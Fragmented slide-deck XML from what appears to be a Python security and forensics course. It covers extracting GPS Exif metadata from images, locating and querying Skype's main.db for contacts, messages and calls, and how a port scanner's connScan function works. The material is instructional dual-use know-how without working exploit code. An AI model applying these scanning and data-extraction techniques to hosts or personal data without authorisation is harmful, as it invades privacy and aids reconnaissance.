          <p:cNvPr id="1060" name="Google Shape;1060;p57"/>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
        <p:nvSpPr>
          <p:cNvPr id="1061" name="Google Shape;1061;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457025" y="2262525"/>
            <a:ext cx="11345700" cy="4426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programmer:~# pip install beautifulsoup4</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Collecting beautifulsoup4</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Downloading beautifulsoup4-4.11.1-py3-none-any.whl (128 kB)</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 128.2/128.2 kB 7.4 MB/s eta 0:00:00</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Collecting soupsieve&gt;1.2</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   Downloading soupsieve-2.3.2.post1-py3-none-any.whl (37 kB)</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Installing collected packages: soupsieve, beautifulsoup4</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="16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urier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Successfully installed beautifulsoup4-4.11.1 soupsieve-2.3.2.post1</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="16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5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Reading Exif Metadata from Images Using Python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336873"/>
            <a:ext cx="11404842" cy="3599316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This technique is used to test the contents of an image file for Exif metadata using the Python Imaging Library (PIL). </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>PIL is a library that adds image-processing capabilities to Python and is also used to quickly extract the metadata associated with GPS-based location information. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>To test these files for metadata, we need to open the object as a PIL Image and use the method named _getexif(). </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Next, we parse the Exif data into an array, the indexing of which is based on the metadata. We check whether the array consists of GPS information based on Exif tags. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1068" name="Google Shape;1068;p58"/>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5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Reading Exif Metadata from Images Using Python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336873"/>
            <a:ext cx="11404842" cy="3599316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>If the image doesn't contain GPS information, the script understands that the object doesn't consist of GPS metadata and will not print anything on the screen. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>By using this script we are able to connect to a URL address, parse or download all files, and check for Exif metadata. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It is worth noting that the accuracy and availability of location information may vary depending on the device and the way the image was taken.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p59"/>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6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600"/>
              <a:t>Investigating application artifacts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1081" name="Google Shape;1081;p6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322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>SQLite is a database management system that stores data in a single flat file on the host, as opposed to local/client storage. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This makes it a popular choice for use in applications, such as Skype. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>In Windows, Skype stores its database, named main.db, in the C:\Documents and Settings|&lt;User&gt;\Application Data\Skype&lt;Skype-account&gt; directory. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>On Mac OS X, the database can be found in the /User/&lt;User&gt;/Library/Application\Support/Skype/&lt;Skype account&gt; directory.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> The data stored in Skype's database includes information such as contacts, conversations, and call logs.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p60"/>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6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a:t>Investigating application artifacts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1088" name="Google Shape;1088;p61"/>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322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The SQLite command line interface (CLI) can be used to interact with a SQLite database, such as the one used by Skype. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>To access the Skype database, you can run the command "sqlite3 main.db" in the command prompt or terminal. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This will open the SQLite CLI and connect to the main.db file, which is the Skype database. Once connected, you can run SQL queries on the database to retrieve, modify, or manipulate data. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1089" name="Google Shape;1089;p61"/>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e9adf94182_2_67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140196" y="8596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BUILDING A PORT SCANNER CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;g1e9adf94182_2_67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402075" y="2279600"/>
            <a:ext cx="10490400" cy="3599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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The portScan func then takes the hostname and target ports as arguments. It will first attempt to resolve an IP address to a friendly hostname using the gethostbyname() function. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Next, it will print the hostname (or IP address) and enumerate through each individual port attempting to connect using the connScan function. The connScan function will take two arguments, tgtHost and tgtPort and attempt to create a connection to the target host and port. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>If it is successful, connScan will print an open port message. If unsuccessful, it will print the closed port message.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="469900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="469900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="469900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Aria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6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a:t>Investigating application artifacts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1095" name="Google Shape;1095;p62"/>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322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>For example, the query "SELECT tbl_name FROM sqlite_master WHERE type==“table”" can be used to display the names of all the tables currently present in the Skype database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-322580" lvl="0" marL="322580" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This query retrieves the names of all tables in the sqlite_master table where the type is "table". It is important to note that running queries directly on the main.db may cause data loss or errors. It's advisable to have a backup of the DB before running any queries.</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1096" name="Google Shape;1096;p62"/>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6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Using python and sqlite3 to automate Skype Database for Queries </a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1102" name="Google Shape;1102;p63"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The SQLite3 library is a programming library that can be used to automate the process of interacting with a SQLite database. It allows developers to establish a connection to a database, such as the main.db file used by Skype, and execute SQL queries to extract information from the database.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>A script can be written to establish a connection to the main.db database and then use the cursor object to execute a SELECT query. The query retrieves data from one or more tables in the database. The result of the query is returned in the form of a data type of array, where each element is a separate array containing the selected data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1103" name="Google Shape;1103;p63"/>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6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Using python and sqlite3 to automate Skype Database for Queries </a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;p64"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>In order to extract data from multiple tables in the database, the script can use a JOIN statement to combine the data from different tables. The JOIN clause is used to combine rows from two or more tables based on a related column between them. For example, if we have a table called "Users" and another table called "Messages", we could use a JOIN clause to combine the data from these two tables based on the "User_id" column, which is present in both tables.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It's worth noting that using the SQLite3 library to automate the process of extracting data from a SQLite database can be a powerful and efficient way to retrieve and manipulate data, but it also can be a dangerous process if not handled correctly. It's important to be aware of the structure and the content of the DB to prevent data loss or errors.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p64"/>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6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Using python and sqlite3 to automate Skype Database for Queries </a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116" name="Google Shape;1116;p65"/>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Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>When working with a SQLite database, it is possible to combine data from multiple tables to extract more meaningful information. In the case of Skype, we can combine data from the "calls" table and the "conversations" table to gain insights into call activities.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The "calls" table contains information such as the timestamp of the call, the identity of the caller and the id of each call. By combining this information with the data in the "conversations" table, we can gain a better understanding of the context of each call, such as who was involved in the call and what was discussed.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
